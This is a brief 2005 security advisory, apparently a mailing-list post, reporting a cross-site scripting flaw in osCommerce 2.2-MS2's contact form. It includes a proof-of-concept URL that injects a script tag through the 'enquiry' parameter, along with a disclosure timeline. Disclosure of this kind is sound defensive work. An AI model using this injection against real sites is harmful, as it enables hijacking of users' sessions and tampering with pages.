osCommerce 2.2-MS2 is susceptible to a cross site scripting attack.
ac6bf46dd191498b292341b2d089922e0f769e893ca80ab4d7cc6dba4fae7292
Hello All,
I have discovered XSS vulnerability in: osCommerce 2.2-MS2
Authors Site: http://www.oscommerce.com/
+-[Example:]--------------------------------------------------+
XSS:
http://www.victimsite.com/contact_us.php?&name=1&email=1&enquiry=%3C/textare
a%3E%3Cscript%3Ealert('w00t');%3C/script%3E
Result:
A nice pop up box.
+-[Notes:]----------------------------------------------------+
Vulnerabilities found on: 09/02/2005
Author(s) Informed on: 09/02/2005
Author(s) Response: None - Just sat on bug list
Author(s) Fix: - None As Of Yet
Regards
John Cobb
JohnC@NoBytes.com
http://www.nobytes.com